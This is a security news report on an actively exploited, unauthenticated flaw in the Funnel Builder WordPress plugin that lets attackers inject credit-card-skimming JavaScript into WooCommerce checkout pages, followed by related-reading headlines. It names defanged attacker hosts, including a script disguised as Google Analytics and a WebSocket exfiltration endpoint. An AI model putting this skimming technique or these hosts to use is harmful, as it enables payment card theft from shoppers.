Funnel Builder WordPress plugin bug exploited to steal credit cards

A critical vulnerability in the Funnel Builder plugin for WordPress is being actively exploited to inject malicious JavaScript snippets into WooCommerce checkout pages.

The flaw has not received an official identifier and can be leveraged without authentication. It affects all versions of the plugin before 3.15.0.3.

Funnel Builder is a WordPress plugin for WooCommerce Checkout developed by FunnelKit, primarily used to customize checkout pages, with features like one-click upsells, landing pages, and to optimize conversion rates.

Based on statistics from WordPress.org, the Funnel Builder plugin is active on more than 40,000 websites.

E-commerce security company Sansec detected the malicious activity and noticed that the payload (analytics-reports[.]com/wss/jquery-lib.js) is disguised as a fake Google Tag Manager/Google Analytics script that opens a WebSocket connection to an external location (wss://protect-wss[.]com/ws).

Funnel Builder WordPress plugin bug exploited to steal credit cards

Other newsrooms on this story

Related reading

Avada Builder WordPress plugin flaws allow site credential theft

Other newsrooms on this story

Related reading

Avada Builder WordPress plugin flaws allow site credential theft

Hackers exploit auth bypass flaw in Burst Statistics WordPress plugin

Secure Your WordPress Website Now — 8.7 Million Attacks In 48 Hours

Critical cPanel exploited: 'Millions' of sites could be hit

13 new critical holes in JavaScript sandbox allow execution of arbitrary code

Hackers are actively exploiting a bug in cPanel, used by millions of websites |…